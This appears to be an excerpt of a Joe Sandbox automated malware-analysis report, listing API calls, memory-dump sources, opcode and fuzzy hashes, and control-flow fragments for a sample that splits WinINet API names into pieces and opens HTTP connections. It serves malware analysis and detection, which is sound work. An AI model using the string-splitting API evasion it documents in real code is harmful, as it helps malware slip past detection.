                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b56fab839cfa54418a2778588338f6c36634b181da33c50a97091da5c3044688
                                          • Instruction ID: 239ae1afe90660b56fb162a11f59a68cbcb0891090ff6689a729853a03b97549
                                          • Opcode Fuzzy Hash: b56fab839cfa54418a2778588338f6c36634b181da33c50a97091da5c3044688
                                          • Instruction Fuzzy Hash: CAF0DAB6204049ABCB08DF98D994CEB77ADEF8C714B19864AFD1CA7215C634EC55CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A72D11,00002000,00003000,00000004), ref: 02A8A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 72c217b29aa7ad98ad1a1e5ff295907549ca5a31e09f184e76d049266af748f8
                                          • Instruction ID: 4a6a2ec736208a0c348763717b978f85a9ba59ff59859a533784c9fe940f2527
                                          • Opcode Fuzzy Hash: 72c217b29aa7ad98ad1a1e5ff295907549ca5a31e09f184e76d049266af748f8
                                          • Instruction Fuzzy Hash: BBF015B2210208AFDB18DF89DC80EAB77BDEF8C754F118159BE4897241C630E910CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A72D11,00002000,00003000,00000004), ref: 02A8A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: 5c75a40f65ea7482a8bb23c615b9a39479413780a0280d2ee7914873c8616b10
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 72F015B2200208ABCB14DF89CC80EAB77ADEF88754F118149BE0897241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(02A84D50,?,?,02A84D50,00000000,FFFFFFFF), ref: 02A8A4B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 4d5536f07c002a8bb2f28c5390d1751280774ff7f2c80ce35a7d0337eff7beba
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: D5D012762402146BD710EB98CC45E97775DEF44750F154459BA1C5B242C530F90086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 377e3bf76b6dbf901805e36c17a116f23e9fa2df42a02e0f7cdb08fddc4d121e
                                          • Instruction ID: c3a9faa53eda2a3b6d833cfd88b7d2dbfd66c7de3afe66ca720d708fe89ae882
                                          • Opcode Fuzzy Hash: 377e3bf76b6dbf901805e36c17a116f23e9fa2df42a02e0f7cdb08fddc4d121e
                                          • Instruction Fuzzy Hash: C6900271B0550402F2007198451470610158BD0205F65C411B4425678D8795DA6175A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 21b814dfd7c50dc4d0d5dd9506804573cd42cd328af95500189efc86a07e7ab1
                                          • Instruction ID: 2d5a8fe3bd765dc406a25aa635cee57e3ba70f4d51b2c1f92484c489ad6e10a0
                                          • Opcode Fuzzy Hash: 21b814dfd7c50dc4d0d5dd9506804573cd42cd328af95500189efc86a07e7ab1
                                          • Instruction Fuzzy Hash: E690027170140402F20075D8540864600158BE0305F55D011B9025665EC665D9A17131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f5f971d2ec5e89120ba75be94ed2e4031c8c7c13ef16a15657887a8b437d6ecb
                                          • Instruction ID: bcac94d44745355762aa2b8199b07d84463be4db5ad2e84568c021a03d481658
                                          • Opcode Fuzzy Hash: f5f971d2ec5e89120ba75be94ed2e4031c8c7c13ef16a15657887a8b437d6ecb
                                          • Instruction Fuzzy Hash: 2990027170148802F2107198840474A00158BD0305F59C411B8425768D8695D9A17121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 439b83a7bbc595153145b6a461bb31a5ce2e32942dcd14a36ea878d5835570ab
                                          • Instruction ID: c635aa67a04aee8809089b62b86d9b2cf63e642691f9142e4ea95cebfb3eec50
                                          • Opcode Fuzzy Hash: 439b83a7bbc595153145b6a461bb31a5ce2e32942dcd14a36ea878d5835570ab
                                          • Instruction Fuzzy Hash: B590027170140842F20071984404B4600158BE0305F55C016B4125764D8615D9617521
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d702d58ebb896fdb453f1a777312581389b490417bcb650d2b03d1be59ed5b5f
                                          • Instruction ID: ba238281edc96160906d74ad19d247971f0c872a4af8124c70e0ccab3f6635c7
                                          • Opcode Fuzzy Hash: d702d58ebb896fdb453f1a777312581389b490417bcb650d2b03d1be59ed5b5f
                                          • Instruction Fuzzy Hash: AC90026174244152B645B198440450740169BE0245795C012B5415A60C8526E966E621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 22cbc7dc68300d526ff60aded2bd48510e76d9fd0083197f01165e1e99338de6
                                          • Instruction ID: d760b09bf26a532c14f7b4ba25ec919904e60de6cc0bf667f3b590b64c35579b
                                          • Opcode Fuzzy Hash: 22cbc7dc68300d526ff60aded2bd48510e76d9fd0083197f01165e1e99338de6
                                          • Instruction Fuzzy Hash: C290027170140413F2117198450470700198BD0245F95C412B4425668D9656DA62B121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 24f46ba1ffd5ddc0755cdbd7bd3952925db79836774b996590425704ebb6abbb
                                          • Instruction ID: 73bf71a135787f44511f57dc4ad6c22e8d4ae606be34bcdffc2c852e67d50925
                                          • Opcode Fuzzy Hash: 24f46ba1ffd5ddc0755cdbd7bd3952925db79836774b996590425704ebb6abbb
                                          • Instruction Fuzzy Hash: C190026971340002F2807198540860A00158BD1206F95D415B4016668CC915D9796321
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 881bd2c77ce557a33f45f3ac80d4d763ff9c3a026239efbcd1886686b2a22e36
                                          • Instruction ID: ab4f2a897564aaa90560eb4247b15a0d047a2db262d1d43bf25d87e354db9cf2
                                          • Opcode Fuzzy Hash: 881bd2c77ce557a33f45f3ac80d4d763ff9c3a026239efbcd1886686b2a22e36
                                          • Instruction Fuzzy Hash: B79002B170140402F2407198440474600158BD0305F55C011B9065664E8659DEE57665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 54ae96770df33d609d1ae8e9dd5b13e266a315497bfccccf99a07a94d38563ee
                                          • Instruction ID: 5ba281ba33ef870ebae355ade595e9e4afc37c8d98fd5ec4a4f36ba683c6f7c7
                                          • Opcode Fuzzy Hash: 54ae96770df33d609d1ae8e9dd5b13e266a315497bfccccf99a07a94d38563ee
                                          • Instruction Fuzzy Hash: FC900261711C0042F30075A84C14B0700158BD0307F55C115B4155664CC915D9716521
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f9cd0cd6e46a31ce16dd844df96b2e8061b8d966551fb02ed8c8bbe8f3685b4d
                                          • Instruction ID: 2a67332f6e821ce190f038d7c14b477e7d2ed56aaf5d99ad643f2d1754668314
                                          • Opcode Fuzzy Hash: f9cd0cd6e46a31ce16dd844df96b2e8061b8d966551fb02ed8c8bbe8f3685b4d
                                          • Instruction Fuzzy Hash: 039002A174140442F20071984414B060015CBE1305F55C015F5065664D8619DD627126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f201be4a67fe5c1bb7b05c8a0dd241342913ca068dcbbdf0b274b7161174c4a6
                                          • Instruction ID: 71f5f2ce1840a5c37ecb80b1f352e0f133c64adc9f9676d8e362e062c4067321
                                          • Opcode Fuzzy Hash: f201be4a67fe5c1bb7b05c8a0dd241342913ca068dcbbdf0b274b7161174c4a6
                                          • Instruction Fuzzy Hash: 95900265711400036205B598070450700568BD5355355C021F5016660CD621D9716121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b39e089aa479784a9bd833c4bbfaeb1fd430fc73b78ebf4f88bf3721860898ad
                                          • Instruction ID: 2d58d9e11b13d4114ee09e0610486e412cd805a74c0b16cef2b9c4fb7b697d01
                                          • Opcode Fuzzy Hash: b39e089aa479784a9bd833c4bbfaeb1fd430fc73b78ebf4f88bf3721860898ad
                                          • Instruction Fuzzy Hash: D390027170140802F2807198440464A00158BD1305F95C015B4026764DCA15DB6977A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 88857430e8057a59f80f68b1cb99b6af4c746680309bd1a9eff0a8abdb80ef11
                                          • Instruction ID: 4c26f0bea3934e0028fdf321257d4b5994dbf56409e71edebb22c21b9ad35e18
                                          • Opcode Fuzzy Hash: 88857430e8057a59f80f68b1cb99b6af4c746680309bd1a9eff0a8abdb80ef11
                                          • Instruction Fuzzy Hash: 3290027170544842F24071984404A4600258BD0309F55C011B40657A4D9625DE65B661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1cebbf55ac59ffed9b26bb009bfa784dc6b8245f7d1405eb33446a7179cd372c
                                          • Instruction ID: 4153ed1ee37d76baee9419e377d8ee67759cd432d0c6fb78496f1c761eee700f
                                          • Opcode Fuzzy Hash: 1cebbf55ac59ffed9b26bb009bfa784dc6b8245f7d1405eb33446a7179cd372c
                                          • Instruction Fuzzy Hash: 8A9002A170240003A20571984414616401A8BE0205B55C021F50156A0DC525D9A17125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 106 2a8aa70-2a8aaa6 107 2a8aaaf-2a8aab6 106->107 108 2a8aaaa call 2a8b010 106->108 109 2a8aab8-2a8aade HttpOpenRequestA 107->109 110 2a8aadf-2a8aae5 107->110 108->107
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AAD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                          • Instruction ID: defbfe259b65e810940cf42008908b88d24d5ea479c56073d7c856348ce02f10
                                          • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                          • Instruction Fuzzy Hash: EE01E9B2905118AFCB04DF98D981DEF7BB9EB48214F158289FD48A7205D671ED10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 111 2a8aae7-2a8aae8 112 2a8aaea-2a8ab36 call 2a8b010 111->112 113 2a8ab55-2a8ab59 111->113 116 2a8ab38-2a8ab52 HttpSendRequestA 112->116 117 2a8ab53 112->117 117->113
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A8AB4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          • Opcode ID: 22d7963b258e660344a3e2751fc39933221bcf54fdf9953c578c0d32ae24ca4e
                                          • Instruction ID: 629c39efbf2713405119cb81d1924388038ee4a6e39a84632e8ce14e7f3ad943
                                          • Opcode Fuzzy Hash: 22d7963b258e660344a3e2751fc39933221bcf54fdf9953c578c0d32ae24ca4e
                                          • Instruction Fuzzy Hash: 270171B1905118AFCF14DF98D885AFF7B78EF48210F148189FD196B205D6719D10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 118 2a8aa66-2a8aab6 call 2a8b010 121 2a8aab8-2a8aade HttpOpenRequestA 118->121 122 2a8aadf-2a8aae5 118->122
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AAD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          • Opcode ID: 47ee530d6cd2ebf6ed2c506b97e73268776e45e95ab42a47425599d7e9f48c0a
                                          • Instruction ID: 3b33f0a3d83b47e58b04a3ed459926c9b5a2a09ce933340ac77d7bb4def7fbb2
                                          • Opcode Fuzzy Hash: 47ee530d6cd2ebf6ed2c506b97e73268776e45e95ab42a47425599d7e9f48c0a
                                          • Instruction Fuzzy Hash: 0A01D7B2904219AFCB04DF88D981DEF7BB9EB48214F158549FA49A7205D670EE11CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 123 2a8aaf0-2a8ab26 124 2a8ab2f-2a8ab36 123->124 125 2a8ab2a call 2a8b010 123->125 126 2a8ab38-2a8ab52 HttpSendRequestA 124->126 127 2a8ab53-2a8ab59 124->127 125->124
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A8AB4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                          • Instruction ID: a08ac8e7d8ee325e27a65cbc64af003c22710b1b94bc61f63940df9c8f1732ce
                                          • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                          • Instruction Fuzzy Hash: 25014BB2905118AFCB04DF98D945AAFBBB8EB48210F108189FD18A7304D670EE10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 129 2a8a9f0-2a8aa36 call 2a8b010 132 2a8aa38-2a8aa5e InternetConnectA 129->132 133 2a8aa5f-2a8aa65 129->133
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AA58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                          • Instruction ID: 0f66edcef148b1f02c039a4c361b0628aa94665d0de2738effd9fbebd63d3fa2
                                          • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                          • Instruction Fuzzy Hash: E701E9B2905118AFCB14DF99D941EEFB7B9EB48310F158289FE48A7241D670EE10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 134 2a8a980-2a8a9c1 call 2a8b010 137 2a8a9de-2a8a9e4 134->137 138 2a8a9c3-2a8a9dd InternetOpenA 134->138
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A8A9D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                          • Instruction ID: e295d0fe29b95fb6b964ced1c70b77fa7ca39f643d390c02b3daaa5143ad37e0
                                          • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                          • Instruction Fuzzy Hash: 03F01DB2901118AF8B14DF98DC419EB77B8FF48310F048589FD5897201D631AA508BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 2a8a978-2a8a9af 140 2a8a9ba-2a8a9c1 139->140 141 2a8a9b5 call 2a8b010 139->141 142 2a8a9de-2a8a9e4 140->142 143 2a8a9c3-2a8a9dd InternetOpenA 140->143 141->140
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A8A9D7
                                          Strings
                                          Memory Dump Source
